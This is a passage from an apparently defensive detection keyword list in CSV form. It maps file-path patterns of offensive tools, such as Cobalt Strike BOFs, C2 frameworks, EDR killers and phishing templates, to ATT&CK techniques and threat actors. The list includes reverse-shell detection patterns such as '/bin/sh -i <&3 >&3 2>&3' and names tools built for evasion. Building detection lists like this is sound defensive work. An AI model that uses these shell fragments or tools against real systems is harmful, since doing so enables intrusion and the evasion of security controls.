Enumeration,https://github.com/kaluche/bloodhound-quickwin,1,0,N/A,6,2,162,17,2023-07-17T14:31:51Z,2021-02-16T16:04:16Z -*/BIFFRecordEncryption.cs*,offensive_tool_keyword,Macrome,An Excel Macro Document Reader/Writer for Red Teamers & Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/,T1140,TA0005,N/A,N/A,Exploitation tools,https://github.com/michaelweber/Macrome,1,1,N/A,N/A,6,522,83,2022-02-01T16:26:13Z,2020-05-07T22:44:11Z -*/bin/0d1n*,offensive_tool_keyword,0d1n,Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.,T1583 - T1584 - T1190 - T1133,TA0002 - TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/CoolerVoid/0d1n,1,1,N/A,N/A,,N/A,,, -*/bin/AceLdr*,offensive_tool_keyword,cobaltstrike,Cobalt Strike UDRL for memory scanner evasion.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/kyleavery/AceLdr,1,1,N/A,10,10,712,123,2023-09-28T19:47:03Z,2022-08-11T00:06:09Z -*/bin/fake-sms*,offensive_tool_keyword,fake-sms,A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.,T1598.003 - T1514,TA0003 - TA0009,N/A,N/A,Defense Evasion,https://github.com/Narasimha1997/fake-sms,1,0,N/A,8,10,2513,167,2023-08-01T15:34:41Z,2021-02-18T15:18:50Z -*/bin/gorsair *,offensive_tool_keyword,Gorsair,Gorsair hacks its way into remote docker containers that expose their APIs,T1552,TA0006,N/A,N/A,Exploitation tools,https://github.com/Ullaakut/Gorsair,1,0,N/A,N/A,9,825,74,2023-09-09T13:18:33Z,2018-08-02T16:49:14Z -*/bin/hakrawler*,offensive_tool_keyword,hakrawler,Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application,T1190 - T1212 - T1087.001,TA0007 - TA0003 - TA0009,N/A,N/A,Web Attacks,https://github.com/hakluke/hakrawler,1,0,N/A,6,10,3967,458,2023-07-22T19:39:11Z,2019-12-15T13:54:43Z -*/bin/posh*,offensive_tool_keyword,poshc2,keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.,T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011,N/A,APT33 - HEXANE,C2,https://github.com/nettitude/PoshC2,1,0,N/A,10,10,1601,312,2023-09-08T05:42:06Z,2018-07-23T08:53:32Z -*/bin/pupysh*,offensive_tool_keyword,pupy,Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C,T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005,TA0002 - TA0003 - TA0004,N/A,N/A,C2,https://github.com/n1nj4sec/pupy,1,1,N/A,10,10,7841,1826,2023-08-28T13:08:08Z,2015-09-21T17:30:53Z -*/bin/read_i.php?a1=step2-down-b&a2=*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*/bin/read_i.php?a1=step2-down-c&a2=*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*/bin/read_i.php?a1=step2-down-j&a2=*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*/bin/read_i.php?a1=step2-down-k&a2=*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*/bin/read_i.php?a1=step2-down-r&a2=*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*/bin/read_i.php?a1=step2-down-u&a2=*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z -*/bin/sh | nc*,greyware_tool_keyword,shell,Reverse Shell Command Line,T1105 - T1021.001 - T1021.002,TA0002 - TA0008,N/A,N/A,shell spawning,https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml,1,0,greyware tool - risks of False positive !,N/A,10,6749,1943,2023-10-03T04:55:17Z,2016-12-24T09:48:49Z -*/bin/sh -i <&3 >&3 2>&3*,greyware_tool_keyword,shell,Reverse Shell Command Line,T1105 - T1021.001 - T1021.002,TA0002 - TA0008,N/A,N/A,shell spawning,https://github.com/SigmaHQ/sigma/blob/master/rules/linux/lnx_shell_susp_rev_shells.yml,1,0,greyware tool - risks of False positive !,N/A,10,6749,1943,2023-10-03T04:55:17Z,2016-12-24T09:48:49Z -*/bin/Sleeper.o*,offensive_tool_keyword,cobaltstrike,Collection of Beacon Object Files (BOF) for Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/crypt0p3g/bof-collection,1,1,N/A,10,10,151,25,2022-12-05T04:49:33Z,2021-01-20T06:07:38Z -*/bin/unshackle*,offensive_tool_keyword,unshackle,Unshackle is an open-source tool to bypass Windows and Linux user passwords from a bootable USB based on Linux,T1110.004 - T1059.004 - T1070.004,TA0006 - TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/Fadi002/unshackle,1,0,N/A,10,10,1482,83,2023-09-23T15:54:14Z,2023-07-19T22:30:28Z -*/bin/wapiti*,offensive_tool_keyword,wapiti,Web vulnerability scanner written in Python3,T1592 - T1592.003,TA0007 - TA0040,N/A,N/A,Web Attacks,https://github.com/wapiti-scanner/wapiti,1,1,N/A,N/A,8,785,132,2023-09-27T07:26:22Z,2020-06-06T20:17:55Z -*/bind_powershell.rb*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z -*/bin-sploits/*.zip*,offensive_tool_keyword,linux-exploit-suggester,Linux privilege escalation auditing tool,T1078 - T1068 - T1055,TA0004 - TA0003,N/A,N/A,Privilege Escalation,https://github.com/The-Z-Labs/linux-exploit-suggester,1,1,N/A,10,10,4725,1055,2023-08-18T17:29:23Z,2016-10-06T21:55:51Z -*/BITB.git*,offensive_tool_keyword,bitb,Browser templates for Browser In The Browser (BITB) attack,T1056.001 - T1134 - T1090,TA0005 - TA0006 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/mrd0x/BITB,1,1,N/A,10,10,2645,463,2023-07-11T04:57:46Z,2022-03-15T16:51:39Z -*/BITB-main*,offensive_tool_keyword,bitb,Browser templates for Browser In The Browser (BITB) attack,T1056.001 - T1134 - T1090,TA0005 - TA0006 - TA0003,N/A,N/A,Sniffing & Spoofing,https://github.com/mrd0x/BITB,1,0,N/A,10,10,2645,463,2023-07-11T04:57:46Z,2022-03-15T16:51:39Z -*/bitcoin-getaddr.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/bitcoin-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/bitcoinrpc-info.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/bitsadmin/bitsadmin.cmd*,offensive_tool_keyword,koadic,Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.,T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218,TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008,N/A,N/A,C2,https://github.com/offsecginger/koadic,1,1,N/A,10,10,199,62,2022-01-03T01:07:01Z,2022-01-03T01:05:43Z -*/BitsArbitraryFileMove*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/bittorrent-discovery.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/bjnp-discover.nse*,offensive_tool_keyword,nmap,Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing,T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007,TA0001 - TA0002 - TA0003 - TA0006,N/A,N/A,Exploitation tools,https://svn.nmap.org/nmap/scripts/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/Blackout.cpp*,offensive_tool_keyword,Blackout,kill anti-malware protected processes using BYOVD,T1055 - T1562.001,TA0005 - TA0004,N/A,N/A,Defense Evasion,https://github.com/ZeroMemoryEx/Blackout,1,1,N/A,N/A,8,740,116,2023-07-21T17:35:09Z,2023-05-25T23:54:21Z -*/Blackout.exe*,offensive_tool_keyword,Blackout,kill anti-malware protected processes using BYOVD,T1055 - T1562.001,TA0005 - TA0004,N/A,N/A,Defense Evasion,https://github.com/ZeroMemoryEx/Blackout,1,1,N/A,N/A,8,740,116,2023-07-21T17:35:09Z,2023-05-25T23:54:21Z -*/Blackout.git*,offensive_tool_keyword,Blackout,kill anti-malware protected processes using BYOVD,T1055 - T1562.001,TA0005 - TA0004,N/A,N/A,Defense Evasion,https://github.com/ZeroMemoryEx/Blackout,1,1,N/A,N/A,8,740,116,2023-07-21T17:35:09Z,2023-05-25T23:54:21Z -*/Blackout.sln*,offensive_tool_keyword,Blackout,kill anti-malware protected processes using BYOVD,T1055 - T1562.001,TA0005 - TA0004,N/A,N/A,Defense Evasion,https://github.com/ZeroMemoryEx/Blackout,1,1,N/A,N/A,8,740,116,2023-07-21T17:35:09Z,2023-05-25T23:54:21Z -*/Blackout.sys*,offensive_tool_keyword,Blackout,kill anti-malware protected processes using BYOVD,T1055 - T1562.001,TA0005 - TA0004,N/A,N/A,Defense Evasion,https://github.com/ZeroMemoryEx/Blackout,1,1,N/A,N/A,8,740,116,2023-07-21T17:35:09Z,2023-05-25T23:54:21Z -*/blindeventlog.exe*,offensive_tool_keyword,DarkWidow,Indirect Dynamic Syscall SSN + Syscall address sorting via Modified TartarusGate approach + Remote Process Injection via APC Early Bird + Spawns a sacrificial Process as target process + (ACG+BlockDll) mitigation policy on spawned process + PPID spoofing (Emotet method) + Api resolving from TIB + API hashing,T1055 - T1055.012 - T1055.002 - T1098 - T1027 - T1027.001 - T1070.004 - T1036 - T1134 - T1140,TA0005 - TA0003 - TA0002 - TA0004,N/A,N/A,Defense Evasion,https://github.com/reveng007/DarkWidow,1,1,N/A,10,3,268,38,2023-08-03T22:37:44Z,2023-07-24T13:59:16Z -*/blob/main/write_anything.c*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1543,TA0008,N/A,N/A,Exploitation tools,https://github.com/gyaansastra/CVE-2022-0847,1,1,N/A,N/A,1,1,2,2022-03-20T15:46:04Z,2022-03-09T15:44:58Z -*/BlockEtw.git*,offensive_tool_keyword,BlockEtw,.Net Assembly to block ETW telemetry in current process,T1055.001 - T1562.001,TA0005,N/A,N/A,Defense Evasion,https://github.com/Soledge/BlockEtw,1,1,N/A,10,1,73,20,2020-05-14T19:24:49Z,2020-05-14T02:40:50Z -*/BlockOpenHandle.git*,offensive_tool_keyword,BlockOpenHandle,Block any Process to open HANDLE to your process - only SYTEM is allowed to open handle to your process - with that you can avoid remote memory scanners,T1050.005 - T1480,TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/BlockOpenHandle,1,1,N/A,9,2,149,21,2023-04-27T05:42:51Z,2023-04-27T05:40:47Z -*/bloodhound.md*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*/bloodhound.py*,offensive_tool_keyword,crackmapexec,bloodhound integration with crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks ,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,1,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*/bloodhound/enumeration*,offensive_tool_keyword,bloodhound,A Python based ingestor for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/fox-it/BloodHound.py,1,1,N/A,10,10,1538,268,2023-09-27T07:56:12Z,2018-02-26T14:44:20Z -*/bloodhound_domain.py*,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,1,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -*/bloodhound_domaintrust.py*,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,1,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -*/bloodhound_gpo.py*,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,1,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -*/bloodhound_object.py*,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,1,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -*/bloodhound_ou.py*,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,1,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -*/bloodhound_schema.py*,offensive_tool_keyword,bofhound,Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel,T1046 - T1087 - T1003,TA0007 - TA0009 - TA0001,N/A,N/A,Discovery,https://github.com/fortalice/bofhound,1,1,N/A,5,3,252,25,2023-09-21T23:23:07Z,2022-05-10T17:41:53Z -*/bloodhound-data*,offensive_tool_keyword,bloodhound,A Python based ingestor for BloodHound,T1057 - T1059 - T1053,TA0003 - TA0008 - TA0009,N/A,N/A,Reconnaissance,https://github.com/fox-it/BloodHound.py,1,1,N/A,10,10,1538,268,2023-09-27T07:56:12Z,2018-02-26T14:44:20Z -*/bloodhound-quickwin.git*,offensive_tool_keyword,bloodhound-quickwin,Simple script to extract useful informations from the combo BloodHound + Neo4j,T1087 - T1087.001 - T1018 - T1069 - T1069.002,TA0007 - TA0003 - TA0004,N/A,N/A,AD Enumeration,https://github.com/kaluche/bloodhound-quickwin,1,1,N/A,6,2,162,17,2023-07-17T14:31:51Z,2021-02-16T16:04:16Z -*/bloodyAD.git*,offensive_tool_keyword,bloodyAD,BloodyAD is an Active Directory Privilege Escalation Framework,T1078.004 - T1059.003 - T1071.001,TA0004 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/CravateRouge/bloodyAD,1,1,N/A,10,9,883,96,2023-09-01T09:12:45Z,2021-10-11T15:07:26Z -*/bluscreenofjeff/*,offensive_tool_keyword,cobaltstrike,A script to randomize Cobalt Strike Malleable C2 profiles and reduce the chances of flagging signature-based detection controls,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/bluscreenofjeff/Malleable-C2-Randomizer,1,1,N/A,10,10,421,96,2022-09-09T15:50:16Z,2017-05-31T15:44:43Z -*/Bo0oM*,offensive_tool_keyword,Github Username,Github username known for exploitation tools. Web application security researcher. Current Location: Moscow. Russia,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/Bo0oM,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*/bof.cpp *,offensive_tool_keyword,Pezor,Open-Source Shellcode & PE Packer,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,Exploitation tools,https://github.com/phra/PEzor,1,0,N/A,10,10,1581,306,2023-09-26T14:00:33Z,2020-07-22T09:45:52Z -*/bof.h,offensive_tool_keyword,cobaltstrike,Collection of beacon object files for use with Cobalt Strike to facilitate,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/rookuu/BOFs,1,0,N/A,10,10,156,26,2021-02-11T10:48:12Z,2021-02-11T10:28:48Z -*/BOF.NET/*,offensive_tool_keyword,cobaltstrike,A .NET Runtime for Cobalt Strike's Beacon Object Files,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/CCob/BOF.NET,1,1,N/A,10,10,557,86,2023-08-13T13:24:00Z,2020-11-02T20:02:55Z -*/bof.nim,offensive_tool_keyword,cobaltstrike,Cobalt Strike BOF Files with Nim!,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 